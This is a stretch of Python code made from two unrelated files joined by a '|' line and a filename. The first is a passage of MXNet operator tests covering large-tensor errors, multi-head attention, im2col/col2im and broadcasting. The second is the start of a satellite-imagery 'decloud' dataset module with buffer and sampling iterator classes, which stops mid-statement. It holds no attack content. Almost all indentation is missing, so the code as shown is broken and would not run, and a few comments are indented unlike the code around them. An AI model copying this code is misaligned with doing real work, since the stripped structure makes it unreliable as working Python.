s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=(1,))
assert s.shape == (1, 1)
def test_large_tensor_disabled_err_msg():
LARGE_X = 4300000000
MEDIUM_X = 1000000000
SMALL_Y = 1
shape = (2, LARGE_X)
def check_nd_array():
x = np.arange(0, LARGE_X)
assertRaises(MXNetError, mx.nd.array, x)
def check_nd_ones():
assertRaises(MXNetError, mx.nd.ones, shape)
def check_nd_zeros():
assertRaises(MXNetError, mx.nd.zeros, shape)
def check_nd_full():
val = 1
assertRaises(Exception, mx.nd.full, shape, val)
def check_nd_arange():
start = 0
stop = LARGE_X
assertRaises(Exception, mx.nd.arange, start, stop)
def check_nd_random():
shape = (2, LARGE_X)
def check_random_exp():
lam = 4
assertRaises(MXNetError, mx.nd.random_exponential, lam, shape)
def check_random_gamma():
alpha = 9
beta = 0.5
assertRaises(MXNetError, mx.nd.random_gamma, alpha, beta, shape)
def check_random_normal():
loc = 0
scale = 1
assertRaises(MXNetError, mx.nd.random_normal, loc, scale, shape)
def check_random_poisson():
lam = 4
            assertRaises(MXNetError, mx.nd.random_poisson, lam, shape)
def check_random_randint():
low = 0
high = 1000000
assertRaises(MXNetError, mx.nd.random_randint, low, high, shape)
def check_random_uniform():
low = 0
            high = 1
            assertRaises(MXNetError, mx.nd.random_uniform, low, high, shape)
def check_multihead_attention_selfatt(dtype):
def convert_weight(F, q_weight, k_weight, v_weight, num_heads):
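        # Pack per-head Q/K/V projection weights into the single interleaved weight
        # matrix consumed by interleaved_matmul_selfatt_qk/valatt.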
q_weight = F.reshape(q_weight, shape=(num_heads, -1, 0), reverse=True)
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(q_weight, k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, q_bias, k_bias, v_bias, num_heads):
q_bias = F.reshape(q_bias, shape=(num_heads, -1))
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(q_bias, k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
    num_heads = 3  # number of attention heads
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'qkv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
qkv_weight = convert_weight(mx.sym, q_weight, k_weight, v_weight, num_heads)
qkv_bias = convert_bias(mx.sym, q_bias, k_bias, v_bias, num_heads)
qkv = mx.sym.transpose(qkv, axes=(1, 0, 2))
qkv_proj = mx.sym.FullyConnected(qkv, weight=qkv_weight, bias=qkv_bias, flatten=False,
num_hidden=qkv_units * 3, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_selfatt_qk(
qkv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_selfatt_valatt(
qkv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
type_dict={'qkv': dtype,
'q_weight': dtype,
'k_weight': dtype,
'v_weight': dtype,
'q_bias': dtype,
'k_bias': dtype,
'v_bias': dtype,
'sonde': dtype},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(qkv, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(qkv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(qkv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
type_dict={'qkv': dtype},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@assert_raises_cuda_not_satisfied(min_version='9.1')
@pytest.mark.serial
def test_multihead_attention_selfatt():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_selfatt(dtype=dtype)
def check_multihead_attention_encdec(dtype):
def convert_weight(F, k_weight, v_weight, num_heads):
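        # Pack per-head K/V projection weights into the interleaved weight matrix
        # consumed by interleaved_matmul_encdec_qk/valatt.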
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, k_bias, v_bias, num_heads):
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
    num_heads = 3  # number of attention heads
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'q': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'kv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
kv_weight = convert_weight(mx.sym, k_weight, v_weight, num_heads)
kv_bias = convert_bias(mx.sym, k_bias, v_bias, num_heads)
kv = mx.sym.transpose(kv, axes=(1, 0, 2))
kv_proj = mx.sym.FullyConnected(kv, weight=kv_weight, bias=kv_bias, flatten=False,
num_hidden=qkv_units * 2, no_bias=False)
q = mx.sym.transpose(q, axes=(1, 0, 2))
q_proj = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_encdec_qk(
q_proj, kv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_encdec_valatt(
kv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
out_weight=(out_dim, qkv_units),
out_bias=(out_dim,),
type_dict={'q': dtype,
'kv': dtype,
'q_weight': dtype,
'q_bias': dtype,
'k_weight': dtype,
'k_bias': dtype,
'v_weight': dtype,
'v_bias': dtype,
'out_weight': dtype,
'out_bias': dtype,
},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(kv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(kv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
type_dict={'q': dtype,
'kv': dtype},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@assert_raises_cuda_not_satisfied(min_version='9.1')
@pytest.mark.serial
def test_multihead_attention_encdec():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_encdec(dtype=dtype)
@pytest.mark.serial
def test_im2col_col2im():
def compute_output_size(spatial, kernel, stride=1, dilate=1, pad=0):
pad_size = spatial + 2 * pad
dilated_kernel = dilate * (kernel - 1) + 1
return (pad_size - dilated_kernel) // stride + 1
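# Worked example: spatial=30, kernel=3, stride=2, dilate=2, pad=1 gives a padded
# size of 32 and a dilated kernel of 5, so the output size is (32 - 5) // 2 + 1 = 14.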
def build_kwargs(kernel, stride=1, dilate=1, pad=0):
return {'kernel': (kernel, kernel),
'stride': (stride, stride),
'dilate': (dilate, dilate),
'pad': (pad, pad)}
# use im2col to compute convolution
def test_conv_compute(input_shape, num_filter, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
w = mx.nd.uniform(shape=(num_filter, channel, kernel, kernel))
c1 = mx.nd.dot(col.transpose((0, 2, 1)), w.reshape(num_filter, -1).T).transpose((0, 2, 1))
hos = compute_output_size(input_shape[2], kernel, stride, dilate, pad)
wos = compute_output_size(input_shape[3], kernel, stride, dilate, pad)
c1 = c1.reshape((batch_size, num_filter, hos, wos))
c2 = mx.nd.Convolution(data, num_filter=num_filter, weight=w, no_bias=True, **kwargs)
assert_almost_equal(c1.asnumpy(), c2.asnumpy(), rtol=1e-5, atol=1e-5)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# use composite of im2col and col2im to reconstruct image
def test_reconstruct(input_shape, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
im1 = mx.nd.col2im(col, input_shape[2:], **kwargs)
im2 = mx.nd.col2im(mx.nd.ones_like(col), input_shape[2:], **kwargs) * data
assert_almost_equal(im1.asnumpy(), im2.asnumpy(), rtol=1e-5, atol=1e-5)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# test gradient
# the grad of im2col is col2im, and vice versa
def test_grad(input_shape, kernel, stride=1, dilate=1, pad=0):
# im2col
data = mx.sym.Variable('data')
kwargs = build_kwargs(kernel, stride, dilate, pad)
sym = mx.sym.im2col(data, **kwargs)
im = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(im, **kwargs)
col_shape = col.shape
expected = mx.nd.col2im(col, input_shape[2:], **kwargs)
check_symbolic_backward(sym, [im.asnumpy()], [col.asnumpy()], [expected.asnumpy()])
# col2im
data = mx.sym.Variable('data')
sym = mx.sym.col2im(data, input_shape[2:], **kwargs)
col = mx.nd.uniform(shape=col_shape)
im = mx.nd.col2im(col, input_shape[2:], **kwargs)
expected = mx.nd.im2col(im, **kwargs)
check_symbolic_backward(sym, [col.asnumpy()], [im.asnumpy()], [expected.asnumpy()])
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
def test_elemwise_sum_for_gradient_accumulation():
for nrepeat in range(1, 10):
stored_grad = dict()
for grad_req in ['write', 'add']:
a = mx.nd.array([1])
b = mx.nd.array([2])
if grad_req == 'write':
a.attach_grad(grad_req='write')
elif grad_req == 'add':
a.attach_grad(grad_req='add')
a.grad[:] = 0
with mx.autograd.record():
for _ in range(nrepeat):
b = b * a
b.backward()
stored_grad[grad_req] = a.grad.asscalar()
assert stored_grad['write'] == stored_grad['add']
assert stored_grad['write'] == 2 * nrepeat
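# Sanity check of the assertion above: b starts at 2 and is multiplied by a
# nrepeat times, so b = 2 * a**nrepeat and db/da = 2 * nrepeat * a**(nrepeat - 1),
# which evaluates to 2 * nrepeat at a = 1.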
def test_elementwise_ops_on_misaligned_input():
a = mx.nd.array([1,2,3,4], dtype='float16')
b = mx.nd.array([1,2,3,4], dtype='float16')
c = a[1:3]
d = b[1:3]
# Note: testing just elemwise_add since all elemwise_ops
# share the implementation
mx.nd.elemwise_add(c, d, out=c)
mx.nd.waitall()
a = mx.nd.array([1,2,3,4], dtype='float16')
b = mx.nd.array([1,2,3,4], dtype='float16')
c = a[0:3]
d = b[0:3]
mx.nd.elemwise_add(c, d, out=c)
mx.nd.waitall()
assert a[3].asscalar() == 4.0
@pytest.mark.parametrize('dtype', ['float16', 'float32', 'float64'])
@pytest.mark.parametrize('lead_dim', [2, 3, 4, 6, 10])
@pytest.mark.parametrize('both_ways', [False, True])
def test_broadcast_ops_on_misaligned_input(dtype, lead_dim, both_ways):
shape = list(rand_shape_2d()) + [lead_dim]
small_shape = [shape[0], 1, lead_dim]
if both_ways:
# Broadcast in both ways [1, K, L] x [M, 1, L]
big_shape = [1, shape[1], lead_dim]
else:
big_shape = shape
size = np.prod(shape)
small_size = np.prod(small_shape)
big_size = np.prod(big_shape)
a = mx.nd.arange(5000)
b = mx.nd.arange(5000)
e = mx.nd.arange(5000)
c = a[1:big_size + 1].reshape(big_shape)
d = b[1:small_size + 1].reshape(small_shape)
f = e[1:size + 1].reshape(shape)
mx.nd.broadcast_add(c, d, out=f)
expected = c.asnumpy() + d.asnumpy()
mx.nd.waitall()
assert_almost_equal(f, expected)
@pytest.mark.parametrize('dtype', ['float16', 'float32', 'float64'])
@pytest.mark.parametrize('lead_dim', [2, 3, 4, 6, 10])
@pytest.mark.parametrize('both_ways', [False, True])
def test_broadcast_ops_on_misaligned_input_oneside(dtype, lead_dim, both_ways):
shape = list(rand_shape_2d()) + [lead_dim]
small_shape = [shape[0], shape[1], 1]
if both_ways:
# Broadcast in both ways [1, K, L] x [M, 1, 1]
big_shape = [1, shape[1], lead_dim]
else:
big_shape = shape
size = np.prod(shape)
small_size = np.prod(small_shape)
big_size = np.prod(big_shape)
a = mx.nd.arange(5000)
b = mx.nd.arange(5000)
e = mx.nd.arange(5000)
c = a[1:big_size + 1].reshape(big_shape)
d = b[1:small_size + 1].reshape(small_shape)
f = e[1:size + 1].reshape(shape)
mx.nd.broadcast_add(c, d, out=f)
expected = c.asnumpy() + d.asnumpy()
mx.nd.waitall()
assert_almost_equal(f, expected)
|
dataset.py
|
# -*- coding: utf-8 -*-
"""
Copyright (c) 2020-2022 INRAE
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
"""Dataset classes"""
import abc
import collections.abc
import json
import logging
import multiprocessing
import threading
import time
import tensorflow as tf
import numpy as np
import random
from decloud.core import system
# -------------------------------------------------- Buffer class ------------------------------------------------------
class Buffer:
"""
Buffer class
Used to store and access a list of objects
"""
def __init__(self, max_length):
self.max_length = max_length
self.container = []
def size(self):
""" Return buffer size """
return len(self.container)
def add(self, new_elem):
""" Add a new element to the buffer """
self.container.append(new_elem)
assert self.size() <= self.max_length
def is_complete(self):
""" Return True if the buffer is complete"""
return self.size() == self.max_length
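# Minimal usage sketch of Buffer (illustrative only):
#
#   buf = Buffer(max_length=2)
#   buf.add("sample-0")
#   buf.add("sample-1")
#   assert buf.is_complete()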
# ---------------------------------------------- RandomIterator class --------------------------------------------------
class BaseIterator(abc.ABC):
"""
Base class for iterators
"""
@abc.abstractmethod
def __init__(self, acquisitions_layout, tile_handlers, tile_rois):
self.tuples_grids = {tile_name: tile_handler.tuple_search(acquisitions_layout=acquisitions_layout,
roi=tile_rois[tile_name] if tile_name in tile_rois
else None)
for tile_name, tile_handler in tile_handlers.items()}
def __iter__(self):
return self
@abc.abstractmethod
def __next__(self):
""" Provides a sequence of (tile_name, tuple_pos, tuple_indices) """
@abc.abstractmethod
def shuffle(self):
""" Shuffle the sequence """
class RandomIterator(BaseIterator):
"""
The most basic iterator. Picks a random tuple among all the available ones, regardless of its position in the grid.
A mapping tuple_id --> (tuple_pos, tuple_indices) is created, then a random tuple is picked among the tuple_ids,
then the corresponding tuple is accessed.
"""
def __init__(self, acquisitions_layout, tile_handlers, tile_rois):
# Count the number of available tuples, and map the tuples: id --> (tile_name, tuple_pos, tuple_indices)
super().__init__(acquisitions_layout, tile_handlers, tile_rois)
# Tuple ID list
self.nb_of_tuples = 0
self.tuples_map = dict()
for tile_name, tuples_grid in self.tuples_grids.items():
for tuple_pos, tuple_indices in tuples_grid.items():
for tuple_idx in tuple_indices:
self.tuples_map[self.nb_of_tuples] = (tile_name, tuple_pos, tuple_idx)
self.nb_of_tuples += 1
self.indices = np.arange(0, self.nb_of_tuples)
self.shuffle()
self.count = 0
def __next__(self):
current_index = self.indices[self.count]
ret = self.tuples_map[current_index]
if self.count < self.nb_of_tuples - 1:
self.count += 1
else:
self.shuffle()
self.count = 0
return ret
def shuffle(self):
np.random.shuffle(self.indices)
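# Illustrative consumption of an iterator; acquisitions_layout, tile_handlers and
# tile_rois are assumed to be built from the sensing_layout / tile_io modules
# (see the Dataset class below):
#
#   it = RandomIterator(acquisitions_layout, tile_handlers, tile_rois)
#   tile_name, tuple_pos, tuple_indices = next(it)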
class ConstantIterator(BaseIterator):
"""
An iterator that aims to deliver the same number of samples at each patch location.
A mapping tuple_id --> (tuple_pos, tuple_indices) is created, then a random tuple is picked among the tuple_ids,
then the corresponding tuple is accessed.
Note that after one epoch the samples are still the same: we do not pick new random samples at each iteration,
which is not a problem if the tuples are converted directly to TFRecords.
"""
def __init__(self, acquisitions_layout, tile_handlers, tile_rois, nbsample_max=10):
# Count the number of available tuples, and map the tuples: id --> (tile_name, tuple_pos, tuple_indices)
super().__init__(acquisitions_layout, tile_handlers, tile_rois)
# Tuple ID list
self.nb_of_tuples = 0
self.tuples_map = dict()
for tile_name, tuples_grid in self.tuples_grids.items():
for tuple_pos, tuple_indices in tuples_grid.items():
rand_tuple_indices = random.sample(tuple_indices, nbsample_max) if len(tuple_indices) > nbsample_max \
else tuple_indices
for tuple_idx in rand_tuple_indices:
self.tuples_map[self.nb_of_tuples] = (tile_name, tuple_pos, tuple_idx)
self.nb_of_tuples += 1
self.indices = np.arange(0, self.nb_of_tuples)
self.shuffle()
self.count = 0
def __next__(self):
current_index = self.indices[self.count]
ret = self.tuples_map[current_index]
if self.count < self.nb_of_tuples - 1:
self.count += 1
else:
self.shuffle()
self.count = 0
return ret
def shuffle(self):
np.random.shuffle(self.indices)
def update(tuple_map, tmp):
""" Update the tuple map """
for key, value in tmp.items():
if isinstance(value, collections.abc.Mapping):
tuple_map[key] = update(tuple_map.get(key, {}), value)
else:
tuple_map[key] = value
return tuple_map
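# Example of the recursive merge performed by update():
#
#   update({"a": {"x": 1}}, {"a": {"y": 2}, "b": 3})
#   -> {"a": {"x": 1, "y": 2}, "b": 3}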
class OversamplingIterator(BaseIterator):
"""
Iterator that provides the same number of samples for each season
Seasons are defined in self.months_list
"""
def __init__(self, acquisitions_layout, tile_handlers, tile_rois):
super().__init__(acquisitions_layout, tile_handlers, tile_rois)
self.months_list = [[3, 4, 5], [6, 7, 8], [9, 10, 11], [12, 1, 2]]
self.distribution = dict()
for i in range(len(self.months_list)):
self.distribution[i] = dict({"count": 0, "number": 0})
self.tuples_map = dict()
self.nb_of_tuples = 0
for tile_name, tuples_grid in self.tuples_grids.items():
for tuple_pos, tuple_indices in tuples_grid.items():
for tuple_idx in tuple_indices:
idx = None
for idx_month, month in enumerate(self.months_list):
if tile_handlers[tile_name].s2_images[tuple_idx["t"]["s2"]].acq_date.month in month:
idx = idx_month
assert idx is not None,\
